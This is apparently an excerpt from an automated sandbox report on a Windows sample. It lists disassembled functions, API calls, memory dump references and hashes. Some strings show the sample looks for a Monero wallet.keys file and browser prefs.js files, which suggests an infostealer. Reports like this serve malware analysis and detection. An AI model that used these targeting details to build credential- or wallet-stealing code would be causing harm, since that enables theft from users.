                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 25e1dde44edeca97866024682c387afa08e5a4317a458df8277136ca70934a69
                        • Instruction ID: 01a24a894f0bf1eb53b2adb83c441f9ea9ee07c16e6c006539b611f288d77855
                        • Opcode Fuzzy Hash: 25e1dde44edeca97866024682c387afa08e5a4317a458df8277136ca70934a69
                        • Instruction Fuzzy Hash: 89E144728111599ADB68FB64CC96EEF7738BF94300F40419BB40A62192EF306F8ADF55
                        Function 005CF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005E15B8,005E0D96), ref: 005CF71E
                        • StrCmpCA.SHLWAPI(?,005E15BC), ref: 005CF76F
                        • StrCmpCA.SHLWAPI(?,005E15C0), ref: 005CF785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CFAB1
                        • FindClose.KERNEL32(000000FF), ref: 005CFAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: f0b6a953a8db65f228e1624c449aafc9671bd9d61425ac2df43f5a976b4c3317
                        • Instruction ID: 52811d2bb5d2f871c9e62244c3c41e8f5271c2e40fe8a0735223e6af268ade65
                        • Opcode Fuzzy Hash: f0b6a953a8db65f228e1624c449aafc9671bd9d61425ac2df43f5a976b4c3317
                        • Instruction Fuzzy Hash: 0DB154719001459FCB34EF64DC99FEE7B79BF94300F4085AAA80A96241EF306B49CF96
                        Function 00994DBC Relevance: 15.4, Strings: 11, Instructions: 1642COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2>6$*"Gr$7D.8$7V?V$=Ewy$N7?$V-?$V0li$X@`V$_>w$c^O
                        • API String ID: 0-1929444058
                        • Opcode ID: 07435698134651fd486eb74240cf005b6b6a8e81d9ab5eaaf794637c647f82d2
                        • Instruction ID: d3a76ae37f36b06e5d4895297421f552755ac4752d1e36eda5e54184084246ae
                        • Opcode Fuzzy Hash: 07435698134651fd486eb74240cf005b6b6a8e81d9ab5eaaf794637c647f82d2
                        • Instruction Fuzzy Hash: 1EB227F360C2009FE3046E2DDC8567AFBE9EF94720F1A893DEAC587744EA3558058697
                        Function 005C16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005E510C,?,?,?,005E51B4,?,?,00000000,?,00000000), ref: 005C1923
                        • StrCmpCA.SHLWAPI(?,005E525C), ref: 005C1973
                        • StrCmpCA.SHLWAPI(?,005E5304), ref: 005C1989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005C1D40
                        • DeleteFileA.KERNEL32(00000000), ref: 005C1DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005C1E20
                        • FindClose.KERNEL32(000000FF), ref: 005C1E32
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: bd8d0e202273cc5618808084fcd5bd8602430a528caf8253ceae7e09c25fdcd7
                        • Instruction ID: fb0f09d9525e309d4b9a14e1b6b7ae99a66978e2eb5133ed9a378f0f93dc6414
                        • Opcode Fuzzy Hash: bd8d0e202273cc5618808084fcd5bd8602430a528caf8253ceae7e09c25fdcd7
                        • Instruction Fuzzy Hash: D01211719101599BCB29EB64CC9AEEF7B78BF94300F40419BB50662291EF306F89CF95
                        Function 005CDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,005E0C2E), ref: 005CDE5E
                        • StrCmpCA.SHLWAPI(?,005E14C8), ref: 005CDEAE
                        • StrCmpCA.SHLWAPI(?,005E14CC), ref: 005CDEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CE3E0
                        • FindClose.KERNEL32(000000FF), ref: 005CE3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 94cf5413f6039012790f9eb69921319645f86da50c5685820fae63f2000bf0b6
                        • Instruction ID: 5e3873efbe96ca7138bc086d8e0ceaedb450cb150d5b8553bd2a4a44041a4d40
                        • Opcode Fuzzy Hash: 94cf5413f6039012790f9eb69921319645f86da50c5685820fae63f2000bf0b6
                        • Instruction Fuzzy Hash: 36F191718101599ADB29EB64CC9AEEF7738BF94300F8041DBA40A62191EF306F89DF55
                        Function 005CDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005E14B0,005E0C2A), ref: 005CDAEB
                        • StrCmpCA.SHLWAPI(?,005E14B4), ref: 005CDB33
                        • StrCmpCA.SHLWAPI(?,005E14B8), ref: 005CDB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CDDCC
                        • FindClose.KERNEL32(000000FF), ref: 005CDDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: c604059a5b17e9568b352f2e832ee843ab02110530c1a7f280cd809c70932d34
                        • Instruction ID: 2e32abef9df58cb8274e586371fd5b676be65b365542bea9edd5631025dc8e45
                        • Opcode Fuzzy Hash: c604059a5b17e9568b352f2e832ee843ab02110530c1a7f280cd809c70932d34
                        • Instruction Fuzzy Hash: 97914B729001059BCB14FBB4DC5AEEE7B7DBFC4300F40856AF90A96245EE349B49CB96
                        Function 005D7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,005E05AF), ref: 005D7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005D7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 005D7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 005D7C62
                        • LocalFree.KERNEL32(00000000), ref: 005D7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: ab77f9ca7cdfbdc7658fd1fbdcae7751c369e0b55d2ca5913881977c2fe99873
                        • Instruction ID: 252824740974da9de7652f7231ba4fd4755de78db23923ab4d87223245ae1b36
                        • Opcode Fuzzy Hash: ab77f9ca7cdfbdc7658fd1fbdcae7751c369e0b55d2ca5913881977c2fe99873
                        • Instruction Fuzzy Hash: C3413E7195021DABDB24DB58DC99BEEBB74FF48700F20419BE40962291DB742F85CFA1
                        Function 0098FC59 Relevance: 10.4, Strings: 7, Instructions: 1637COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$=2/$DH}$a<Zw$gYuG$ph7~$q_?
                        • API String ID: 0-2370584753
                        • Opcode ID: 12123123a85776d79a9f74ba8be88745d46a5ad68b50b1ca763c6b92a2c02703
                        • Instruction ID: 16de28dce564fb7c2d128a2136d4f237baaa82b96bafc941cca9a80e9b28d3e7
                        • Opcode Fuzzy Hash: 12123123a85776d79a9f74ba8be88745d46a5ad68b50b1ca763c6b92a2c02703
                        • Instruction Fuzzy Hash: 47B238F360C200AFE3086E2DEC9567ABBE5EF94720F16463DEAC4C7744EA3558058796
                        Function 0099847F Relevance: 10.4, Strings: 7, Instructions: 1635COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: oy_$#yg_$5(?{$EI}$GIXD$GP_}$eV
                        • API String ID: 0-2648983576
                        • Opcode ID: e0230cd943f6d48727a60190027f2859c2184ffcee7c71da2bb639ea9d206652
                        • Instruction ID: 9163f4b63f04377e734f20bce37f3e592ba3bf1a0f3acbf10c934f6f6880c611
                        • Opcode Fuzzy Hash: e0230cd943f6d48727a60190027f2859c2184ffcee7c71da2bb639ea9d206652
                        • Instruction Fuzzy Hash: 9BB2D8F360C204AFE704AE2DEC8577AB7E9EF94720F16492DE6C4C7744EA3598018696
                        Function 005CE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,005E0D73), ref: 005CE4A2
                        • StrCmpCA.SHLWAPI(?,005E14F8), ref: 005CE4F2
                        • StrCmpCA.SHLWAPI(?,005E14FC), ref: 005CE508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CEBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 094fb4d3de3b41d3217a393696a2ffcffa81f1eb589d19cf8a9592e3c7dad4d3
                        • Instruction ID: 83957a699950ebf663f88d6397735f4f398bd2d77b428fc921b518fda0446eb4
                        • Opcode Fuzzy Hash: 094fb4d3de3b41d3217a393696a2ffcffa81f1eb589d19cf8a9592e3c7dad4d3
                        • Instruction Fuzzy Hash: 7D1233719101159ADB28FB74DC9AEEF7B38BF94300F40419BB50A56291EE306F89CF96
                        Function 0098C74C Relevance: 9.1, Strings: 6, Instructions: 1597COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
